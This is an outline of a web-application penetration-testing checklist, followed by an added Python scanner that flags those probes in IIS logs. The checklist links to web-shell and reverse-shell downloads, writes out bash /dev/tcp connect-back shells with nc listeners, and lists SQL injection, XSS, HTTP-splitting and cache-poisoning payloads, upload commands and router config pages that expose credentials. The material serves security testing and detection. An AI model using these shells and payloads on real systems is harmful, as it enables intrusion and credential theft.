• Fingerprint server
  • Crawl website
    • lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)
    • httprint
    • Metagoofil
      • metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
  • Web Directory enumeration
  • Vulnerability Assessment
    • Manual Tests
      • Default Passwords
      • Install Backdoors
        • ASP
          • http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
        • Assorted
          • http://michaeldaw.org/projects/web-backdoor-compilation/
          • http://open-labs.org/hacker_webkit02.tar.gz
        • Perl
          • http://home.arcor.de/mschierlm/test/pmsh.pl
          • http://pentestmonkey.net/tools/perl-reverse-shell/
          • http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
        • PHP
          • http://php.spb.ru/remview/
          • http://pentestmonkey.net/tools/php-reverse-shell/
          • http://pentestmonkey.net/tools/php-findsock-shell/
        • Python
          • http://matahari.sourceforge.net/
        • TCL
          • http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
        • Bash Connect Back Shell
          • GnuCitizen
            • Attack Box: nc -l -p Port -vvv
            • Victim: $ exec 5<>/dev/tcp/IP_Address/Port
            • Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
          • Neohapsis
            • Attack Box: nc -l -p Port -vvv
            • Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
            • Victim: $ exec 1>&0 # Next we copy stdin to stdout
            • Victim: $ exec 2>&0 # And finally stdin to stderr
            • Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
      • Method Testing
        • nc IP_Address Port
          • HEAD / HTTP/1.0
          • OPTIONS / HTTP/1.0
          • PROPFIND / HTTP/1.0
          • TRACE / HTTP/1.1
          • PUT http://Target_URL/FILE_NAME
          • POST http://Target_URL/FILE_NAME HTTP/1.x
      • Upload Files
        • curl
          • curl -u <username:password> -T file_to_upload <Target_URL>
          • curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
        • put.pl
          • put.pl -h target -r /remote_file_name -f local_file_name
        • webdav
      • View Page Source
        • Hidden Values
        • Developer Remarks
        • Extraneous Code
        • Passwords!
      • Input Validation Checks
        • NULL or null
          • Possible error messages returned.
        • ' , " , ; , <!
          • Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
        • - , = , + , "
          • Used to craft SQL Injection queries.
        • ' , & , ! , | , < , >
          • Used to find command execution vulnerabilities.
        • "><script>alert(1)</script>
          • Basic Cross-Site Scripting Checks.
        • %0d%0a
          • Carriage Return (%0d) Line Feed (%0a)
            • HTTP Splitting
              • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
                • i.e. once decoded the injected headers read: Content-Length: 0 / HTTP/1.1 200 OK / Content-Type: text/html / Content-Length: 47 / <html>blah</html>
            • Cache Poisoning
              • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
        • %7f , %ff
          • byte-length overflows; maximum 7- and 8-bit values.
        • -1, other
          • Integer overflow and underflow vulnerabilities.
        • %n , %x , %s
          • Testing for format string vulnerabilities.
        • ../
          • Directory Traversal Vulnerabilities.
        • % , _, *
          • Wildcard characters can sometimes present DoS issues or information disclosure.
        • Ax1024+ (a string of 1024 or more "A" characters)
          • Overflow vulnerabilities.
      • Automated table and column iteration
        • orderby.py
          • ./orderby.py www.site.com/index.php?id=
        • d3sqlfuzz.py
          • ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
    • Vulnerability Scanners
    • Specific Applications/ Server Tools
      • Domino
      • Joomla
        • cms_few
          • ./cms.py <site-name>
        • joomsq
          • ./joomsq.py <IP>
        • joomlascan
          • ./joomlascan.py <site> <options> (options i.e. -p/-proxy <host:port>: add proxy support; -404: don't show 404 responses)
        • joomscan
          • ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
        • jscan
          • jscan.pl -f hostname
          • (shell.txt required)
      • aspaudit.pl
        • asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
      • Vbulletin
        • vbscan.py
          • vbscan.py <host> <port> -v
          • vbscan.py -update
      • ZyXel
        • zyxel-bf.sh
        • snmpwalk
          • snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
        • snmpget
          • snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
  • Proxy Testing
  • Examine configuration files
    • Generic
      • Examine httpd.conf/ windows config files
    • JBoss
      • JMX Console http://<IP>:8080/jmx-console/
    • Joomla
      • configuration.php
      • diagnostics.php
      • joomla.inc.php
      • config.inc.php
    • Mambo
      • configuration.php
      • config.inc.php
    • WordPress
      • setup-config.php
      • wp-config.php
    • ZyXel
      • /WAN.html (contains PPPoE ISP password)
      • /WLAN_General.html and /WLAN.html (contains WEP key)
      • /rpDyDNS.html (contains DDNS credentials)
      • /Firewall_DefPolicy.html (Firewall)
      • /CF_Keyword.html (Content Filter)
      • /RemMagWWW.html (Remote MGMT)
      • /rpSysAdmin.html (System)
      • /LAN_IP.html (LAN)
      • /NAT_General.html (NAT)
      • /ViewLog.html (Logs)
      • /rpFWUpload.html (Tools)
      • /DiagGeneral.html (Diagnostic)
      • /RemMagSNMP.html (SNMP Passwords)
      • /LAN_ClientList.html (Current DHCP Leases)
      • Config Backups
        • /RestoreCfg.html
        • /BackupCfg.html
        • Note: the above config files are not human readable and the following tool is required to break out possible admin credentials and other important settings
  • Examine web server logs
    • c:\winnt\system32\Logfiles\W3SVC1
      • awk -F " " '{print $3,$11}' filename | sort | uniq
  • References
  • Exploit Frameworks
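As an added, defender-side example that is not part of the original checklist: a small Python scanner that parses IIS W3C extended logs of the kind kept under c:\winnt\system32\Logfiles\W3SVC1 and flags the probes listed under "Method Testing" and "Input Validation Checks" (PUT/PROPFIND method testing, %0d%0a HTTP splitting, ../ traversal, the <script> XSS check and Ax1024+ long inputs). The log entries are constructed; only the column names come from the IIS #Fields directive.

```python
import re
from urllib.parse import unquote

# Constructed sample in IIS W3C extended log format (not a real server log).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-01-01 10:00:01 10.0.0.5 GET /index.php id=1 80 - 192.0.2.10 Mozilla/5.0 200
2023-01-01 10:00:02 10.0.0.5 PUT /shell.aspx - 80 - 192.0.2.10 curl/7.0 201
2023-01-01 10:00:03 10.0.0.5 PROPFIND / - 80 - 192.0.2.10 - 207
2023-01-01 10:00:05 10.0.0.5 GET /page.php language=foobar%0d%0aContent-Length:%200 80 - 192.0.2.10 Mozilla/5.0 200
2023-01-01 10:00:06 10.0.0.5 GET /download.php file=../../etc/passwd 80 - 192.0.2.10 Mozilla/5.0 404
2023-01-01 10:00:07 10.0.0.5 GET /search.php q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 80 - 192.0.2.10 Mozilla/5.0 200
""" + "2023-01-01 10:00:08 10.0.0.5 GET /login.php user=" + "A" * 1100 + " 80 - 192.0.2.10 Mozilla/5.0 500\n"

RISKY_METHODS = {"PUT", "DELETE", "PROPFIND", "TRACE", "MOVE", "COPY"}  # rare from browsers
PATTERNS = {  # matched after URL-decoding, so %0d%0a is seen as a real CR/LF
    "crlf-injection": re.compile(r"[\r\n]"),
    "directory-traversal": re.compile(r"\.\./"),
    "xss-probe": re.compile(r"<script", re.I),
}

def parse_w3c(text):
    """Yield one dict per entry; the #Fields directive names the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):  # skip malformed lines instead of misaligning columns
                yield dict(zip(fields, parts))

def decode_field(value):
    """URL-decode repeatedly (undoes double encoding); IIS writes '-' for an empty field."""
    value = "" if value == "-" else value
    while unquote(value) != value:  # every pass shortens the string, so this terminates
        value = unquote(value)
    return value

def scan(text):
    """Return (client_ip, method, uri_stem, finding) for every entry matching a probe."""
    findings = []
    for row in parse_w3c(text):
        method, stem = row["cs-method"].upper(), row["cs-uri-stem"]
        decoded = decode_field(stem) + "?" + decode_field(row["cs-uri-query"])
        hits = ["risky-method:" + method] if method in RISKY_METHODS else []
        hits += [name for name, pat in PATTERNS.items() if pat.search(decoded)]
        if len(row["cs-uri-query"]) >= 1024:  # the Ax1024+ overflow probe
            hits.append("long-input")
        findings += [(row["c-ip"], method, stem, hit) for hit in hits]
    return findings
```

Group the findings by c-ip to see which source is walking through the checklist; a burst of several distinct finding types from one address within minutes is the usual signature of this kind of assessment.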